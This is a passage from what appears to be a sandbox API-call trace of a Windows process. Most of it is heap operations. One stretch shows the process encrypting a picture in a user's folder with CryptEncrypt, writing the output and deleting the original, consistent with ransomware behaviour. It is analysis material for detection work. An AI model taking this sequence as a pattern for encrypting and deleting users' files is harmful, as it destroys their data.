hHeap=0x1780000) returned 1 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca29) returned 0x4516010 [0087.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0087.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca29) returned 0x452f480 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0087.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.140] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0087.140] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.140] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0087.142] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2690, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2690*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0087.142] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.142] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xca29, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xca30) returned 1 [0087.143] CharLowerBuffW (in: lpsz="byte[51761]", cchLength=0xb | out: lpsz="byte[51761]") returned 0xb [0087.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.143] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453beb8*, pdwDataLen=0x144e790*=0xca29, dwBufLen=0xca30 | out: pbData=0x453beb8*, pdwDataLen=0x144e790*=0xca30) returned 1 [0087.143] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.143] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xca30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xca30, lpOverlapped=0x0) returned 1 [0087.145] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0087.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca430, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.145] CryptDestroyKey (hKey=0x41ac180) returned 1 [0087.145] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.146] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.146] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0087.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.146] FreeLibrary (hLibModule=0x756e0000) returned 1 [0087.146] CloseHandle (hObject=0x258) returned 1 [0087.146] CloseHandle (hObject=0x298) returned 1 [0087.148] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp", lpFilePart=0x0) returned 0x28 [0087.148] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\9tpncyb524p.bmp")) returned 0x20 [0087.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0087.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.149] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd22c4e00, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0x3438bd60, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x3438bd60, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0xca29, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9TpncYB524P.bmp", cAlternateFileName="9TPNCY~1.BMP")) returned 0x41ac280 [0087.149] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\9tpncyb524p.bmp")) returned 1 [0087.201] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd22c4e00, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0x3438bd60, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x3438bd60, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0xca29, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9TpncYB524P.bmp", cAlternateFileName="9TPNCY~1.BMP")) returned 0 [0087.201] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.202] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0087.202] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0087.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da7a0 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0087.203] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.203] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.203] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0087.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) 